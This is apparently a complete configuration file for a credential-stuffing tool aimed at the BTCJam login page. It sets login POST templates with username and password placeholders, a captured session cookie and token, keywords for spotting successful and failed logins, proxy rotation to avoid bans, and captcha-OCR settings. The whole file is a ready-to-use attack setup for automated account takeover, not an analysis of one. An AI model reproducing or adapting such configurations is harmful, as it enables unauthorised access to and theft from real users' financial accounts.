[Wordlist]
UserIndex=1
PassIndex=2
EmailIndex=0
DB67E5B026C15D9A75E7CC9B6877D6DB=0
51302CF5E4D838F2C8217177E3C66A2A=0
4039DA19A5D19F0514073CD773A7B1DA=0
480060113B0119718A97E3B189218D74=0
13EAF68F42F4557F40B7A83ECC06DBB4=599
1B86AA54F9E02768A6EBB33E7F7B3B5E=15702
F4330BAF4EEAE860A9CFDFC0CB4558F2=0
C3E6A0EA1A719F96E9D38F552ADF8211=0
10BD34E932EDEFF6696CDDA3F0ABD3EA=3175
9AC43C06C4D7C95EC613DF1DE3A3AF7D=0
9B10C3EDCCA5FB3AF287232D3EDB719C=0
95C13F1D422B4057AB92C38455604A0B=0
2B942490BCAF4C9D1FE9C473A2A9304C=0

[Settings]
SiteURL=https://btcjam.com/users/sign_in?landing_page=show
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
ComboMode=0
EmailFilter=0
EmailMode=0
UsernameStart=6
UsernameEnd=8
InvalidChars=
AllowedChars=
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordStart=6
PasswordEnd=8
PasswordInvalidChars=
PasswordAllowedChars=
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowRatio=10
BanWindowProxies=10
blnNoProxies=1
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
RequestMethod=2
Referer=0
POSTData=email=<USER>&password=<PASS>&utf8=%E2%9C%93&authenticity_token=pVDXoyftVBJtNalSSfM7uAUe7krzK0%2FwddDVpqgsjqo%3D&user%5Bemail%5D=<USER>&user%5Bpassword%5D=<PASS>&commit=Log+in

[Fake]
AfterFP=1
blnSuccess=0
SuccessRetries=3
blnProcessErrors=0
blnCompleteNot=1
EnableConHits=0
ConHits=0
FollowRedirect=1
EnableConLength=0
ConLength=-1
SourceTags=1
UserField=0
HTTPFollow=1
blnForbToOK=0
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3

[Keywords]
EnableHeaderSuccess=1
EnableHeaderBan=0
EnableHeaderFail=0
EnableHeaderRetry=0
HeaderSuccess=<title>Dashboard - BTCJam - BTCJam</title>;<FIELD:HTTP>||https://btcjam.com/;<FIELD:LOCATION>||https://btcjam.com/
HeaderBan=
HeaderFail=
HeaderRetry=
EnableGlobalSourceRetry=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceFail=1
EnableSourceRetry=0
SourceSuccess=>You have signed up successfully.;class='active';>Dashboard;class='alert alert-dismissible alert-success';https://btcjam.com/
SourceBan=
SourceFail=>Invalid email or password.;>Forgot your password?
SourceRetry=

[Form]
IAParse=0
LoginPostData=
LoginMethod=1
LoginHeader=0
Action=https://btcjam.com/users/sign_in?landing_page=show
Username=email
Password=password
Email=
AddData=utf8=%E2%9C%93&authenticity_token=pVDXoyftVBJtNalSSfM7uAUe7krzK0%2FwddDVpqgsjqo%3D&user%5Bemail%5D=<USER>&user%5Bpassword%5D=<PASS>&commit=Log+in
CustomData=
NoIndex=
Cookie=_session_id=a37ab6d7c052f9e4215cb1bef30b8a7f
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=
RedPostData=
RedKeys=
DataDesc=
CaptureParsingCode=
RefreshSession=0
RefreshCookie=1
FormHeader=0
AjaxHeader=0
RedHeader=0
IAMethod=2
POSTMethod=2
RedMethod=1
ImageAfterAjax=0
blnBasic=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1

[Ajax]
Variables=
PostElements2=
RedURL=

[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnCharTable=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnThreeImages=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng